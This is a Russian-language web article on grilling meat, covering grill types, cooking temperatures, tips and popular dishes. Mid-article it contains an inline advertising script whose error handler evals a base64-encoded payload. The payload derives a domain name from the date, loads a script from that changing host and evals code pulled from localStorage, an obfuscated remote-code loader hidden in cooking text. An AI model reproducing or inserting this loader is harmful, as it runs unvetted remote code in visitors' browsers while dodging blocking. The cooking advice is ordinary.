Как правильно жарить мясо на гриле

Кто хотя бы раз попробовал блюда, приготовленные на гриле, обязательно захочет повторить этот праздник вкуса. Аппетитная румяная корочка, легкий аромат дымка, рисунок решетки на сочном стейке – возбуждают аппетит.

Культура гриллинга зародилась в южных американских штатах. Простейшие рецепты обжарки мяса на гриле с годами усовершенствовались. Распространившийся по всему миру культ барбекю расширил свою рецептуру. Клубы и фестивали гриля позволяют сторонникам приготовления на углях обмениваться рецептами и угостить других блюдами на гриле с личными «секретными» ингредиентами.

Какой гриль нужен

Сегодня любителям барбекю производители грилей предлагаю агрегаты:

электрическиегазовыеугольные

Это могут быть компактные модели для кухни или пикника, стационарные установки для крупных ресторанов или кафе. Размер или модель гриля не влияет на качество приготовления. Достаточно желания, немного умения и гриль-барбекю воплотит в действительность самые смелые рецепты по приготовлению мяса. Для закрытых помещений рекомендуются электрические грили, при наличии вытяжки можно использовать газовые. Угольные грили идеальны для открытых площадок. Они немного более хлопотны в обслуживании, что компенсируется неповторимым ароматом дымка в готовых продуктах.

Тайны приготовления мяса

Самым популярным блюдом на гриле является мясо. У тех, кто не пробовал мясо на гриле бытует мнение, что под румяной корочкой скрывается сухая мякоть. Это не имеет ничего общего с действительностью. Равномерный жар внутри гриля способствует быстрому выделению сока, который «запирается» внутри стейка или ребрышек сочную ароматную структуру. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Несколько советов от гриль-повара помогут приготовить любое мясо сочным и полезным даже для тех, кто придерживается правильного питания:

разогреть гриль на максимальной мощности в течение 10-15 минут при закрытой крышкемясо замариновать и охладитьобсушить мясо при помощи бумажного полотенцаоптимальная температура для жарки стейков 230-260 °Cсмазать решетку растительным масломобжарьте мясо на решетке гриля с каждой стороны в течение 2-3 минут при открытой крышкепереложите мясо в зону непрямого жара и оставьте еще на 2-3 минуты мясо при закрытой крышкеготовое мясо снять с гриля и дать «отдохнуть» перед подачей в течение нескольких минут

Солить мясо лучше непосредственно перед жаркой, так как соль провоцирует выделения сока, а влага не способствует образованию румянца.

Лучшие рецепты мяса на гриле

Мясо на гриле можно жарить не только на открытых углях. Есть множество блюд приготовления в фольге, горшочках, глине и др. В ресторанах с гриль меню есть множество вариантов барбекю по рецептуре из всех уголков мира:

стейкиребрышкиптицушашлыклюля-кебабшефталяколбаски и многое другое

Любое из блюд, предложенных рестораторами можно с легкостью воплотить в домашних условиях. Важными ингредиентами в приготовлении мяса на гриле являются маринады и соусы. Благодаря маринадом мясо насыщается ароматом приправ, а соусы прекрасно подчеркивают и дополняют вкус готовых блюд.
(adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/kak-pravilno-zharit-myaso-na-grile/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top